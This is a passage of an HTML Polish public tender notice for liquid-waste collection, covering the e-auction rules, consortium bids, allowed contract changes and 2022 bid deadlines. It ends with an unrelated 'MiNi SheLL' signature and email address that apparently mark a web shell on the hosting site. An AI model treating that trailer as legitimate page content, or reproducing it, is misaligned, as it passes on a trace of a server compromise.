pomocą formularza umieszczonego na stronie internetowej, umożliwiającego wprowadzanie niezbędnych danych w trybie bezpośredniego połączenia z tą stroną, składają kolejne korzystniejsze postąpienia, podlegające automatycznej ocenie i klasyfikacji. Postąpienia pod rygorem nieważności, składa się opatrzone bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.<br/>11.6.	Jedynym kryterium oceny ofert w aukcji elektronicznej jest cena brutto za realizację przedmiotowego zamówienia. Ceną wyjściową w aukcji elektronicznej dla każdego Wykonawcy jest cena brutto zaproponowana przez danego Wykonawcę w złożonej ofercie pisemnej. <br/>11.7. Postąpienia składane w toku aukcji elektronicznej będą podlegały automatycznej ocenie i klasyfikacji, zgodnie ze wzorem określonym w punkcie 21.1. SWZ.<br/>11.8.	W przypadku nieprzeprowadzenia aukcji lub, gdy po jej przeprowadzeniu nie ulegnie zmianie najkorzystniejsza oferta wybrana w II etapie oceny ofert wskazanym w pkt. 20.2. SWZ, wiążąca jest ocena dokonana w II etapie.<br/>11.9. W załączniku nr 3 do SWZ w pkt. 8 należy wpisać osobę uprawnioną do składania ofert w imieniu Wykonawcy w trakcie aukcji elektronicznej. W przypadku, gdy będzie to inna osoba niż podpisująca ofertę, należy załączyć do oferty pełnomocnictwo dla tej osoby, podpisane przez osobę/y uprawnioną/e do reprezentowania Wykonawcy, z którego wynikać będzie prawo do reprezentowania Wykonawcy w aukcji elektronicznej.<br/>11.10. Jeżeli w wyniku przeprowadzenia aukcji elektronicznej zostanie wybrana oferta z niższą ceną niż uznana za najkorzystniejszą w II etapie oceny ofert (patrz pkt. 20.2 SWZ), Wykonawca zobowiązany będzie w terminie wyznaczonym przez Zamawiającego, przedstawić ponownie wypełniony Formularz ofertowy, uwzględniający wynik aukcji. Poszczególne ceny jednostkowe i całkowita wartość zamówienia nie mogą być wyższe niż te podane w Formularzu ofertowym załączonym do oferty w I etapie oceny ofert. <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 8.1.	Dopuszcza się możliwość składania jednej oferty przez dwa lub więcej podmiotów (konsorcjum, spółka cywilna), pod warunkiem, że Wykonawcy przedłożą wraz z ofertą pełnomocnictwo ustanawiające pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego spełniające w szczególności następujące wymogi:<br/>1)	ustanowienie pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego;<br/>2)	nazwa postępowania, którego dotyczy pełnomocnictwo;<br/>3)	określenie wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby wykonawcy;<br/>4)	oznaczenie ustanowionego pełnomocnika oraz zakres jego umocowania;<br/>5)	dokument pełnomocnictwa musi być podpisany przez wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia w tym przez wykonawcę-pełnomocnika;<br/>6)	podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji, stosowne odpisy z rejestru lub ewidencji muszą zostać dołączone do oferty;<br/>7)	oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie musi być załączona do oferty.<br/>8.2. Każdy z wykonawców wspólnie ubiegających się o zamówienie (działających w ramach konsorcjum, spółki cywilnej), oddzielnie musi złożyć: <br/>1) oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu - załącznik nr 4 i 5 do SWZ; <br/>2) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej; <br/>3) oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej - złącznik nr 8 do SWZ. <br/>Pozostałe dokumenty, formularze i oświadczenia składa pełnomocnik reprezentujący wszystkich wykonawców. <br/>8.3.	W zakresie doświadczenia, potencjału technicznego, wymaganego poziomu przychodów oraz spełnienia pozostałych wymagań określonych w SWZ, oferty składane przez konsorcjum lub spółkę cywilną zostaną ocenione pod kątem łącznego spełnienia wymagań zamawiającego przez występujących wspólnie wykonawców na podstawie złożonych dokumentów.<br/>8.4.	Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu oferty lub wskazać w treści oferty.<br/>8.5. Przed zawarciem umowy Zamawiający może żądać od Wykonawcy, którego oferta została wybrana, umowy regulującej współpracę wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8.6.	Wykonawcy wspólnie ubiegających się o zamówienie, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>8.7. Wykonawcy wspólnie ubiegający się o zamówienie, mogą realizaować zamówienie w zakresie doświadczenia jakie posiadają w wykonywaniu robót objętych zakresem zamówienia.<br/>8.8. Wykonawcy wspólnie ubiegający się o zamówienie, zgodnie z art 117 ustawy Prawo zamówień publicznych, składają wraz z ofertą oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 24.6. Zgodnie z art. 455 ust 1, 2, 3, 4 ustawy Prawo zamówień publicznych określa się następujące możliwe zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:<br/>1) skrócenie terminu realizacji przedmiotu zamówienia, spowodowane wyczerpaniem środków finansowych na zamówienie,<br/>2) zmiana harmonogramu wywozu nieczystości płynnych lub zakresu zamówienia w przypadku zmiany liczby budynków administrowanych przez Zamawiającego,<br/>3) zmiana formy zabezpieczenia należytego wykonania przedmiotu umowy.<br/>4)zmiana terminu realizacji przedmiotu zamówienia w uzasadnionych nieprzewidzianych przypadkach, uniemożliwiających wykonanie zamówienia w terminie np. bankructwa Wykonawcy, braku dostępu do posesji, wyczerpania środków na realizację zamówienia i.t.p., <br/>5)zmiana wartości przedmiotu zamówienia w przypadku zmniejszenia lub zwiększenia zakresu przedmiotu zamówienia polegające na zmianie liczby studzienek chłonnych i liczby budynków, administrowanych przez Zamawiającego oraz odpowiedniego zmniejszenia lub zwiększenia z tego tytułu ostatecznego wynagrodzenia Wykonawcy;<br/>6)w przypadku gdy spełnienie świadczenia usług groziłoby jednej ze stron rażącą stratą;<br/>7)w przypadku gdy zmiana pozostaje w bezpośrednim związku przyczynowo-skutkowym z wystąpieniem danych okoliczności i nie wykracza poza to co konieczne w celu przeciwdziałania skutkom takiej zmiany okoliczności. <br/>Zmiany umowy dokonane sprzecznie z dopuszczalnym zakresem zmian umowy, określonych w ust. 2 skutkują nieważnością takiej zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zgn-wawer.ezamawiający.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com